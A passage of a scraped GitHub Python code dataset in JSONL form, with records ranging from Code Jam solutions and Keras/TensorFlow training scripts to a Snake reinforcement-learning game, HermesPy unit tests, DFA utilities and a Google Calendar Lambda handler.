heapq.heappop(self.heap)[2]\n\n def all_get_assigned(self, maximum):\n return maximum.num > self.remaining\n\n def split_maximum(self, maximum):\n maxlength = maximum.length\n if maxlength == 1:\n new_elements = []\n elif maxlength == 2:\n new_elements = [ConsecStalls(1, maximum.num)]\n elif (maxlength - 1) % 2 == 0:\n new_elements = [ConsecStalls((maxlength - 1) // 2, maximum.num * 2)]\n else:\n new_elements = [ConsecStalls((maxlength - 1)// 2, maximum.num),\n ConsecStalls((maxlength - 1) // 2 + 1, maximum.num)]\n\n return new_elements\n\n def push_stalls_to_heap(self, new_elements):\n for element in new_elements:\n self.single_safe_push(element)\n\n def single_safe_push(self, element):\n heap_element = element.create_heap_element()\n heapq.heappush(self.heap, heap_element)\n\n def last_placement_found(self):\n maxlen = self.final_broken_block.length\n #print('Optimum: ', maxlen)\n\n minLs = (maxlen - 1)// 2\n if (maxlen - 1) % 2 != 0:\n maxLs = minLs + 1\n else:\n maxLs = minLs\n\n self.minLs = minLs\n self.maxLs = maxLs\n\n def print_optimum(self):\n print_case(self.name, self.maxLs, self.minLs)\n\ndef print_case(name, maxLs, minLs):\n string = 'Case #' + str(name) + ': ' + str(maxLs) + ' ' + str(minLs)\n print(string)\n\ndef main():\n testcases = int(input())\n for i in range(testcases):\n intstr = input().strip().split()\n N, K = [int(x) for x in intstr]\n if N == K:\n print_case(i + 1, 0, 0)\n else:\n instance = Instance(i + 1, N, K)\n instance.solve()\n instance.print_optimum()\n\nif __name__ == '__main__':\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/760.py","file_name":"760.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29632218383","text":"from datetime import datetime\nimport logging\n\nfrom celery import Celery\nimport pandas as pd\n\nfrom tadawol.strategies.macd import MACD\nfrom tadawol.strategies.base_strategy import BaseStrategy\nfrom tadawol.strategies.reverse import Reverse\nfrom tadawol.history import get_top_tickers, get_fresh_data\nfrom tadawol.services import email\nfrom tadawol.config import BrokerConfig\n\n\napp = Celery(\"tasks\", broker=BrokerConfig().url)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _send_entry_and_exit(entry_df: pd.DataFrame, exit_df: pd.DataFrame, strategy: BaseStrategy):\n\n exit_columns = [\"Date\", \"Ticker\", \"Close\", \"week_previous_entries\", \"exit_reason\"]\n\n html = \"\"\"\\\n \n \n \n

Entries

\n {0}\n

Exits

\n {1}\n \n \n \"\"\".format(entry_df.to_html(), exit_df[exit_columns].to_html())\n subject = f\"{strategy.name} on {datetime.today().date()}\"\n email.send_email(html, subject)\n\n\n@app.task\ndef execute_macd_reverse_strategies(\n min_top_ticker: int,\n max_top_ticker: int\n):\n strategies = [MACD(), Reverse()]\n tickers = get_top_tickers(min_top_ticker, max_top_ticker)\n df = get_fresh_data(tickers)\n for strategy in strategies:\n try:\n today_trades, today_exits = strategy.get_today_trades_and_exits(df.copy(deep=True))\n logger.info(\"****************** RESULTS **********************\")\n logger.info(\"****************** ENTRIES **********************\")\n logger.info(today_trades)\n logger.info(\"****************** EXITS *************************\")\n logger.info(today_trades)\n #_send_entry_and_exit(today_trades, today_exits, strategy)\n except KeyboardInterrupt as k_e:\n raise KeyboardInterrupt from k_e\n","repo_name":"yassineameur/tadawol","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32750431479","text":"\"\"\"\nTensorflow 2 quickstart\n\"\"\"\n# Setup the TensorFlow\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Load the MNIST dataset\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train) = (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\n# Build a machine learning model\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Dense(128, activation='relu', input_shape=(28 * 28,)),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10)])\n\n# Print logits\npredictions = model(x_train[:1]).numpy()\nprint(predictions)\n\n# Print probabilities\nprint(tf.nn.softmax(predictions).numpy())\n\n# Define a loss function\nloss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\nprint(loss_fn(y_train[:1], predictions).numpy())\n\nmodel.compile(optimizer='adam',\n loss=loss_fn,\n metrics=['accuracy'])\n\nprint(model.summary())\n\n# Train and evaluate the model\nmodel.fit(x_train, y_train, epochs=5)\n\nprint(model.evaluate(x_test, y_test, verbose=2))\n\n# Attach the softmax to the trained model to return probability\nprobability_model = tf.keras.Sequential([\n model,\n tf.keras.layers.Softmax()])\n\nprint(probability_model(x_test[:5]))\n","repo_name":"mts0629/tensorflow-tutorial","sub_path":"ml_basics_with_keras/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23646398231","text":"import threading\ntimer = None\nthread_dict = {}\n\ninp = open('C-large.in', 'r')\nout = open('C-large.out', 'w')\ntest = int(inp.readline())\n\ndef no_of_recycle_pairs(digits, num, limit):\n res, cur = 0, {}\n for i in range(digits - 1):\n rem = num % (10 ** (i + 1))\n temp = num / (10 ** (i + 1))\n new = rem * (10 ** (digits - i - 1)) + temp\n if new not in cur:\n res += (num < new and new <= limit) and 1 or 0\n cur[new] = 0\n return res\n\ndef calculate(index, digits, A, span, B):\n global thread_dict\n res = 0\n if digits == 1:\n return res\n for num in range(A, span + 1):\n res += no_of_recycle_pairs(digits, num, B)\n thread_dict[index][1] = res\n return\n \n\nfor i in range(1, test+1):\n data = inp.readline().split(' ')\n data[-1] = data[-1][-1] == '\\n' and data[-1][:-1] or data[-1]\n data = [int(num) for num in data]\n A, B = data[0], data[1]\n no_of_thread, cur = (B - A) <= 100 and 1 or 10, A\n test, digit = B, 0\n written = False\n while test:\n digit += 1\n test /= 10\n thread_dict.clear()\n for j in range(no_of_thread):\n thread_dict[j] = [threading.Thread(target = calculate, args = (j, digit, cur, cur + (B - A) / no_of_thread, B)), 0]\n cur += (B - A) / no_of_thread + 1\n for thread in thread_dict:\n thread_dict[thread][0].start()\n def check():\n global timer, thread_dict, written\n flag = False\n for thread in thread_dict:\n if thread_dict[thread][0].isAlive():\n flag = True\n break\n if flag:\n timer = threading.Timer(1.0, check)\n timer.start()\n return\n res = 0\n for thread in thread_dict:\n res += thread_dict[thread][1]\n out.write(\"Case #%d: %s\\n\" %(i, res))\n written = True\n return\n \n timer = threading.Timer(1.0, check)\n timer.start()\n while not written:\n pass\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/707.py","file_name":"707.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27957690826","text":"from PIL import ImageGrab\r\nimport cv2\r\nimport numpy as np\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('enigma.mp4',fourcc,60,(1920,1080),True)\r\nwhile True:\r\n img = np.array(ImageGrab.grab())\r\n out.write(img)\r\n## cv2.imshow('window',img)\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cv2.destoryAllWindows()\r\n break\r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"liwenhan220/Enigma","sub_path":"videowriter.py","file_name":"videowriter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35015250142","text":"import keras\nfrom PIL import Image\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Activation\nfrom keras.layers import MaxPooling2D, Convolution2D\n\nimport numpy as np\nfrom keras.utils import np_utils\n\nfrom numpy import array\nfrom numpy import size\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nimport os\n\n\n\"%matplotlib inline\"\n\npath1 = 'D:\\Coding\\OpenCV\\Sudoku\\All'\npath2 = 'D:\\Coding\\OpenCV\\Sudoku\\All_Proc'\n\nimg_rows= img_cols = 128\n\nlisting = os.listdir(path1)\nnum_samples = size(listing)\nprint(num_samples)\n\n# for file in listing:\n# Image.open(path1 + \"\\\\\" + file)\n\nimage1 = (Image.open(path1 + \"\\\\\" + listing[0]))\nimage2 = array(Image.open(path1 + \"\\\\\" + listing[0])).flatten()\n\nimgmatrix = array([array(Image.open(path1 + '\\\\' + img)).flatten()for img in listing],\"f\")\n\nlabel = np.zeros((num_samples,),dtype=int)\nlabel.shape\n\nlistingnd = np.array(listing)\n\nlabel[0:1016] = 0\nlabel[1016:2032] = 1\nlabel[2032:3048] = 2\nlabel[3048:4064] = 3\nlabel[4064:5080] = 4\nlabel[5080:6096] = 5\nlabel[6096:7112] = 6\nlabel[7112:8128] = 7\nlabel[8128:9144] = 8\nlabel[9144:10160] = 9\n\ndata,Label = shuffle(imgmatrix,label,random_state = 2)\ntemp = [data,Label]\n\nprint(temp[0].shape)\nprint(temp[1].shape)\n\n#batch_size to train\nbatch_size = 256\n# number of output classes\nnb_classes = 10\n# number of epochs to train\nnb_epoch = 1\n\n\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\nnb_pool = 2\n# convolution kernel size\nnb_conv = 3\n\nX = temp[0]\ny = temp[1]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.15, random_state=4)\nX_train.shape\ny_test.shape\n\n\nX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols,1)\nX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols,1)\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\nX_train /= 255\nX_test /= 255\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv,border_mode='valid',input_shape=(img_rows, img_cols,1)))\nconvout1 = Activation('relu')\nmodel.add(convout1)\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\nconvout2 = Activation('relu')\nmodel.add(convout2)\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta',metrics=['accuracy'])\n\nhist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_test, Y_test))\n\nfrom keras.models import load_model\nmodel.save(\"My_model.h5\")\n","repo_name":"pathak-aman/AR_Sudoku_Solver","sub_path":"CNN-Chars74k.py","file_name":"CNN-Chars74k.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36863021773","text":"import datetime\nfrom dateutil.parser import parse\nimport json\n\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nCALENDAR_ID = 'bleh@group.calendar.google.com'\n\ndef create_event_from_message(message):\n\n start_datetime = parse(message['pass_begin'])\n end_datetime = parse(message['pass_end'])\n\n event = {\n 'summary': message['satellite']['name'],\n 'location': 'Des Moines, IA',\n 'description': message['satellite']['frequency'],\n 'start': {\n 'dateTime': start_datetime.isoformat(),\n 'timeZone': 'Etc/UTC'\n },\n 'end': {\n 'dateTime': end_datetime.isoformat(),\n 'timeZone': 'Etc/UTC'\n }\n }\n\n return event\n\ndef post_to_google_calendars(event_body):\n scopes = ['https://www.googleapis.com/auth/calendar']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n './SatStalkerPredictor.json',\n scopes\n )\n\n http_auth = credentials.authorize(Http())\n\n service = build('calendar', 'v3', http=http_auth)\n\n service.events().insert(\n calendarId=CALENDAR_ID,\n body=event_body\n ).execute()\n\ndef lambda_handler(event, context):\n for record in event['Records']:\n parsed_record = json.loads(record['Sns']['Message'])\n\n new_event = create_event_from_message(parsed_record)\n\n post_to_google_calendars(new_event)\n\ndef main():\n lambda_handler(None, None)\n\nif __name__ == '__main__':\n main()\n","repo_name":"n8dgr8/minister_of_calendars","sub_path":"minister_of_calendars.py","file_name":"minister_of_calendars.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23595048821","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport sys\n\nmagic=\"welcome to code jam\"\nmod=10000\n\ndef noccur(s):\n\t'''Find the number of occurrences of magic as a subsequence of s'''\n\tdp=(len(magic)+1)*[0]\n\tdp[0]=1\n\tfor c in s:\n\t\tfor i in range(1, 1+len(magic)):\n\t\t\tif c==magic[i-1]:\n\t\t\t\tdp[i]+=dp[i-1]\n\t\t\t\tdp[i]%=mod\n\treturn dp[len(magic)]\n\nprint(\"\\n\".join([\"Case #{0}: {1:0>4}\".format(i+1,noccur(s.strip())) for (i,s) in enumerate(sys.stdin.readlines()[1:]) if not s.isspace() ]))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_36/375.py","file_name":"375.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18554567175","text":"import os\nimport time\nimport pygame\nimport numpy as np\nfrom random import randint\nimport random\n\nimport torch\n\nfrom game import Game\nfrom render import Render\nfrom config import Options\nfrom agent import Agent\nfrom menu import Menu\n\n\nclass Run:\n def __init__(self, options):\n self.render = Render()\n self.agent = Agent(options)\n self.agent = self.agent\n self.model = self.agent.model\n self.counter_games = 0\n self.record = 0\n self.total_score = 0\n self.score_plot = []\n self.counter_plot = []\n self.start_clock = time.time()\n\n def play(self, training):\n pygame.init()\n\n while self.counter_games < options.num_games:\n game = Game(options.game_width, options.game_height)\n snake = game.snake\n apple = game.apple\n\n # Perform first move\n game.init_game(snake, game, apple, self.agent, options.batch_size)\n\n steps = 0 # steps in the game\n while (not game.crash) and (steps < 100):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n quit()\n\n if training:\n # agent.epsilon is set to decay by each step, create less random moves over time\n self.agent.epsilon = 1 - (self.counter_games * 0.01)\n else:\n self.agent.epsilon = 0.01\n\n # get old state\n state_old = self.agent.get_state(game, snake, apple)\n\n # Random action or action from neural network\n if random.uniform(0, 1) < self.agent.epsilon:\n final_move = np.eye(3)[randint(0, 2)]\n else:\n # Predict action based on the old state\n with torch.no_grad():\n state_old_tensor = torch.tensor(\n state_old.reshape((1, 11)), dtype=torch.float32\n )\n prediction = self.agent.prediction(state_old_tensor)\n final_move = np.eye(3)[\n np.argmax(prediction.detach().cpu().numpy()[0])\n ]\n\n # Perform new move and get new state\n snake.play_step(\n final_move,\n snake.x,\n snake.y,\n game,\n apple,\n self.agent,\n )\n # Set reward for the new state\n reward = self.agent.set_reward(snake, game.crash)\n\n # If food is eaten, steps is set to 0\n if reward > 0:\n steps = 0\n\n if training:\n state_new = self.agent.get_state(game, snake, apple)\n self.agent.train_short_memory(\n state_old, final_move, reward, state_new, game.crash\n )\n # Store the new data into a long term memory\n self.agent.remember(\n state_old, final_move, reward, state_new, game.crash\n )\n else:\n record = game.get_record(game.score, self.record)\n self.render.display(snake, apple, game, record)\n pygame.time.wait(options.delay)\n\n steps += 1\n\n self.counter_games += 1\n self.total_score += game.score\n print(f\"Game {self.counter_games} Score: {game.score}\")\n\n if training:\n self.agent.train_long_memory(self.agent.memory, options.batch_size)\n self.score_plot.append(game.score)\n self.counter_plot.append(self.counter_games)\n\n if training:\n stop_clock = time.time()\n model_weights = self.model.state_dict()\n if not os.path.exists(options.weights_path):\n os.makedirs(options.weights_path)\n torch.save(model_weights, options.weights_path)\n options.plot(\n self.counter_plot, self.score_plot, self.start_clock, stop_clock\n )\n return self.total_score\n\n\nif __name__ == \"__main__\":\n pygame.font.init()\n options = Options()\n run = Run(options)\n agent = Agent(options)\n\n agent.model = agent.model_selection(options)\n\n menu = Menu(options, options.game_width, options.game_height + 60)\n init = menu.intro(run.play, agent.model)\n","repo_name":"Gako358/snake","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5580952727","text":"# -*- coding: utf-8 -*-\n\"\"\"Test general pilot-based correlation synchronization\"\"\"\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock\n\nimport numpy as np\n\nfrom hermespy.core import Signal\nfrom hermespy.modem.waveform_correlation_synchronization import CorrelationSynchronization\nfrom unit_tests.core.test_factory import test_yaml_roundtrip_serialization\n\n__author__ = \"Jan Adler\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass TestCorellationSynchronization(TestCase):\n \"\"\"Correlation synchronization class testing\"\"\"\n\n def setUp(self) -> None:\n\n self.threshold = .91\n self.guard_ratio = .81\n self.synchronization = CorrelationSynchronization(threshold=self.threshold, guard_ratio=self.guard_ratio)\n \n def test_init(self) -> None:\n \"\"\"Initialization parameters should be properly stored as class attributes\"\"\"\n\n self.assertEqual(self.threshold, self.synchronization.threshold)\n self.assertEqual(self.guard_ratio, self.synchronization.guard_ratio)\n\n def test_threshold_setget(self) -> None:\n \"\"\"Threshold property getter should return setter argument\"\"\"\n\n expected_threshold = .1\n self.synchronization.threshold = expected_threshold\n\n self.assertEqual(expected_threshold, self.synchronization.threshold)\n\n def test_threshold_validation(self) -> None:\n \"\"\"Threshold property should raise ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.synchronization.threshold = -.1\n\n with self.assertRaises(ValueError):\n self.synchronization.threshold = 1.1\n\n def test_guard_ratio_setget(self) -> None:\n \"\"\"Guard ratio property getter should return setter argument\"\"\"\n\n expected_guard_ratio = .1\n self.synchronization.guard_ratio = expected_guard_ratio\n\n self.assertEqual(expected_guard_ratio, self.synchronization.guard_ratio)\n\n def test_guard_ratio_validation(self) -> None:\n \"\"\"Guard ratio property should raise ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.synchronization.guard_ratio = -.1\n\n with self.assertRaises(ValueError):\n self.synchronization.guard_ratio = 1.1\n\n def test_synchronize(self) -> None:\n \"\"\"Synchronization should properly order pilot sections into frames\"\"\"\n\n pilot_sequence = Signal(np.ones(20, dtype=complex), 1.)\n\n waveform_generator = Mock()\n waveform_generator.pilot_signal = pilot_sequence\n waveform_generator.samples_in_frame = 20\n self.synchronization.waveform_generator = waveform_generator\n\n shifted_sequence = np.append(np.zeros((1, 10), dtype=complex), pilot_sequence.samples, axis=1)\n\n pilot_indices = self.synchronization.synchronize(shifted_sequence)\n self.assertSequenceEqual([10], pilot_indices)\n \n def test_default_synchronize(self) -> None:\n \"\"\"Synchronization should properly order pilot sections into frames\"\"\"\n \n pilot_sequence = Signal(np.ones(20, dtype=complex), 1.)\n\n waveform_generator = Mock()\n waveform_generator.pilot_signal = pilot_sequence\n waveform_generator.samples_in_frame = 20\n self.synchronization.waveform_generator = waveform_generator\n\n empty_sequence = np.zeros((1, 40), dtype=complex)\n\n pilot_indices = self.synchronization.synchronize(empty_sequence)\n self.assertSequenceEqual([], pilot_indices)\n \n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n test_yaml_roundtrip_serialization(self, self.synchronization)\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/unit_tests/modem/test_waveform_correlation_synchronization.py","file_name":"test_waveform_correlation_synchronization.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"75066170755","text":"from termcolor import colored\r\n# VERIFICATION FUNCTIONS: Used To help the validity of the task at hand. \r\n\r\n# returns 0,1, and -1 if it is an invalid input. Checks if the input is either a \"no\" or \"yes\"\r\ndef GetCondition(prompt):\r\n if prompt == \"yes\" or prompt == \"YES\" or prompt == \"Yes\" or prompt == \"Y\" or prompt == \"y\":\r\n return 1\r\n if prompt == \"no\" or prompt == \"NO\" or prompt == \"No\" or prompt == \"N\" or prompt == \"n\":\r\n return 0\r\n return -1\r\n\r\n# checks if the string can be in numeral form.\r\ndef ValidInt(analyzed_str):\r\n if analyzed_str.isnumeric():\r\n return True\r\n else:\r\n return False\r\n\r\n# checks if the node parameter is inside the DFA.\r\ndef NodeInDFA(node, dfa):\r\n for i in dfa.keys:\r\n if node == i:\r\n return True\r\n return False\r\n\r\n# Prints out the status of the node and its connecting edges.\r\ndef PrintOutNodesAndEdges(dfa):\r\n for node in dfa.keys:\r\n edges = dfa.node_dictionary[node]\r\n edge0 = str(edges[0])\r\n edge1 = str(edges[1])\r\n if edge0 == \"-1\":\r\n edge0 = \"??\"\r\n if edge1 == \"-1\":\r\n edge1 = \"??\"\r\n\r\n print(colored(\"[ Node \" + str(node) + \": \" + \"edge 0\" + \"--> \" + \"Node \" + edge0 + \" || \" + \"edge 1\" + \"--> \" + \"Node \" + edge1 + \" ]\", \"magenta\"))\r\n\r\n# DFA BUILDER FUNCTIONS: Functions that collect the information to create a working DFA. \r\n\r\ndef EstablishNumberOfNodes(dfa):\r\n valid_input = False\r\n while valid_input == False:\r\n num_of_nodes = input('Please enter number of nodes: ')\r\n if num_of_nodes.isnumeric() == True:\r\n dfa.number_of_nodes = num_of_nodes\r\n valid_input = True \r\n else:\r\n print(colored(\"Not a Valid Number. Please Try Again.\", 'red'))\r\n\r\ndef EstablishStartState(list_of_nodes, dfa):\r\n valid_input = False\r\n while valid_input == False:\r\n start_node = input(\"Out of the nodes \" + str(list_of_nodes) + \", pick the starting node: \")\r\n if ValidInt(start_node) == True:\r\n for node in list_of_nodes:\r\n if node == int(start_node):\r\n dfa.q0 = int(start_node)\r\n valid_input = True\r\n break\r\n if valid_input == False:\r\n print(colored(\"Invalid start node. Please pick from the list.\", 'red'))\r\n\r\ndef EstablishFinalStates(dfa):\r\n for node in dfa.keys:\r\n valid_input = False\r\n while valid_input == False:\r\n final_state = input(\"Is node \" + str(node) + \" a final state? [Y/n] \")\r\n value = GetCondition(final_state)\r\n if value == 1:\r\n dfa.final_states.append(True)\r\n valid_input = True;\r\n elif value == 0:\r\n dfa.final_states.append(False)\r\n valid_input = True;\r\n else:\r\n print(colored(\"Invalid Input: Please try again.\", \"red\"))\r\n\r\ndef ConnectEdgesToNodes(dfa):\r\n avail_nodes = dfa.keys\r\n for node in avail_nodes: \r\n for edge in range(2):\r\n valid_input = False\r\n while valid_input == False:\r\n PrintOutNodesAndEdges(dfa)\r\n print(\"Choose out of the available nodes: \", avail_nodes)\r\n proposed_node = input(\"What node does edge \" + str(edge) + \" of node \" + str(node) + \" go to? \")\r\n if ValidInt(proposed_node) and NodeInDFA(int(proposed_node), dfa):\r\n dfa.node_dictionary[node][edge] = int(proposed_node)\r\n valid_input = True\r\n else:\r\n print(colored(\"Invalid Input. Please try again\", 'red'))\r\n\r\n # LANGUAGE VALIDITY FUNCTIONS: After DFA is created these functions check the validity of the language.\r\n\r\ndef ValidString(language):\r\n for c in language:\r\n if c != \"1\" and c != \"0\":\r\n return False\r\n return True\r\n\r\ndef NodeIsInFinalState(node, dfa):\r\n return dfa.final_states[node]\r\n","repo_name":"CeeBeeCodes/LMU-Graduate-Program","sub_path":"DFA/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"264248298","text":"import numpy as np\nimport pandas as pd\n\ndef masked_stats_to_dataframe(data,msklist,list_counts = 'G_mag_L2_PIXEL_COUNT',mean_type='m1'):\n masked_means = {}\n\n for metric in msklist:\n df = data[metric].copy()\n df = df.apply(lambda x: pd.Series(x))\n #df.columns = thresholds_list\n #masked_means[metric] = np.round(df.mean().tolist(),2)\n if mean_type =='m1':\n\n if metric == 'thresholds':#\n print(metric)\n masked_means[metric] = data[metric].apply(lambda x: pd.Series(x)).mean()\n #masked_means[metric] =#continue here\n else:\n masked_means[metric] = np.round(np.divide(df.sum(), data[list_counts].apply(lambda x: pd.Series(x)).sum()).tolist(), 2)#new\n elif mean_type =='m2':\n masked_means[metric] = np.round(\\\n np.sqrt(np.divide(df.sum(), data[list_counts].apply(lambda x: pd.Series(x)).sum()).tolist()), 2)\n masked_means['thresholds'] = data['thresholds'].iloc[0][:-1]\n masked_means['px_count'] = data[list_counts].apply(lambda x: pd.Series(x)).sum()\n out = pd.DataFrame(masked_means).T\n out.columns = data['thresholds'].iloc[0][:-1]\n return out\n\n","repo_name":"stsavian/equivariant_of_estimation","sub_path":"benchmark_networks/dataframe_operations/cell_list_to_single_cell.py","file_name":"cell_list_to_single_cell.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4255568144","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nimport os.path as osp\n\nimport numpy as np\nimport pytest\n\nfrom sisl.io.siesta.fa import *\n\npytestmark = [pytest.mark.io, pytest.mark.siesta]\n_dir = osp.join(\"sisl\", \"io\", \"siesta\")\n\n\ndef test_si_pdos_kgrid_fa(sisl_files):\n f = sisl_files(_dir, \"si_pdos_kgrid.FA\")\n fa = faSileSiesta(f).read_data()\n\n assert len(fa) == 2\n fa1 = faSileSiesta(f).read_force()\n assert np.allclose(fa, fa1)\n\n\ndef test_read_write_fa(sisl_tmp):\n f = sisl_tmp(\"test.FA\", _dir)\n\n fa = np.random.rand(10, 3)\n faSileSiesta(f, \"w\").write_force(fa)\n fa2 = faSileSiesta(f).read_force()\n\n assert len(fa) == len(fa2)\n assert np.allclose(fa, fa2)\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/io/siesta/tests/test_fa.py","file_name":"test_fa.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"35580217392","text":"# ------------------------------------------------------------------------\r\n# Escreva a função n_primos que recebe um número inteiro maior ou igual\r\n# a 2 como parâmetro e devolve a quantidade de números primos que existem\r\n# entre 2 e n (incluindo 2 e, se for o caso, n).\r\n# ------------------------------------------------------------------------\r\n\r\ndef ehPrimo(n):\r\n if (n == 2):\r\n return True\r\n elif (n % 2 == 0):\r\n return False\r\n else:\r\n i = 3\r\n while (i <= (n / i)):\r\n if ((n % i) == 0):\r\n return False\r\n i += 2\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef n_primos(n):\r\n if (n < 2):\r\n return 0\r\n elif (n == 2):\r\n return 1\r\n else:\r\n contador = 1\r\n while (n > 2):\r\n if (ehPrimo(n)):\r\n contador += 1\r\n n -= 1\r\n return contador\r\n\r\n return 0\r\n\r\n\r\n# funcao para retornar o maior numero primo\r\ndef maior_primo(n):\r\n if (n < 2):\r\n return 0\r\n elif (n == 2):\r\n return 2\r\n else:\r\n\r\n while (n > 2):\r\n if (ehPrimo(n)):\r\n return n\r\n n -= 1\r\n return n\r\n\r\n return 0","repo_name":"Arduinobymyself/COURSERA","sub_path":"n_primos.py","file_name":"n_primos.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2986818884","text":"#!/usr/bin/env python3\nimport argparse\nimport sqlite3\nimport hashlib\nimport os\nimport re\nimport simba\nimport configparser\nfrom glob import *\nfrom os.path import *\nimport importlib.util\nimport pathlib\n\n#For deploy mode\n#from . import util\n#from . import simba\n#For local mode\nfrom simba import util\nfrom simba import database\n#simbaPath = util.getSimbaDir(pathlib.Path.cwd())\n\ndef add(simbaPath, config, scripts, mode='add', __directories=None, databasename=None, remove=None, specifictable=None, updateall=False,verbose=True,locations=None):\n retlist = []\n\n # Preserve the original current working directory, since we may be\n # be moving around a bit.\n workingDirectory = pathlib.Path.cwd().resolve()\n\n from glob import glob\n from os.path import basename\n tables = []\n if (simbaPath/\"data.ini\").is_file():\n config = configparser.ConfigParser()\n config.read(simbaPath/\"data.ini\")\n for sec in config.sections():\n if len(sec.split(' ')) == 1:\n # option 1: name only\n if '-' in sec:\n raise Exception(\"Table name \"+sec+\" contains a hyphen; hyphens are not allowed.\")\n names = [sec]\n elif \"for\" in sec.split(' '):\n # option 2: execute python query\n os.chdir(str(simbaPath)+'/../')\n exeret = dict()\n exec(\"from glob import glob; from os.path import basename; names = [\" + sec + \"]\",exeret)\n names = exeret['names']\n else:\n # option 3: treat as list of names\n names = sec.split(' ')\n \n match = config[sec]['match']\n \n for name in names:\n if config.has_option(sec,'name'): tablename = config[sec]['name'].replace(\"$NAME\",name)\n else: tablename = 